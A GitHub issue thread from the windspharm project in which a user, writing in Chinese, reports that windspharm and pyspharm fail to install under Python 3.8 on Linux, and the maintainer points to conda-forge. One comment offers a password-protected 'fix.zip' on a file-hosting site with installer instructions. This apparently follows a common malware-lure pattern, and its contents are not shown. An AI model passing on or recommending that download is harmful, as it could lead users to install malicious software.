### ISSUE TITLE
windspharm和pyspharm安装失败

### ISSUE THREAD

**Issue by zlsGitHupStudyUser** [ajdawson/windspharm#128]
我的python版本为3.8，在linux平台上安装windspharm时，会同时安装pyspharm，但是一直安装失败。
![1724820819283](https://github.com/user-attachments/assets/1fef6833-94f8-4ad6-bab5-a18188ebae3f)
实在不知道如何解决。

**Comment by zlsGitHupStudyUser** [comment]
还有就是windspharm对numpy有依赖要求吗， 我安装的windspharm是1.7，pyspharm是1.0.9，python版本是3.8，numpy版本是1.23.3。

**Comment by zlsGitHupStudyUser** [comment]
并且官网上说最简单的方法是通过conda， 但是我通过conda install -c conda-forge windspharm 这个指令根本找不到这个库，无法通过conda安装

**Comment by Gaurav9812** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ajdawson** [comment]
The package and all dependencies are available on conda-forge. Your platform and version should have compatible packages, although pyspharm is no longer built for python 3.8 I think there is an older build for 3.8 still available (but better to upgrade if you can).
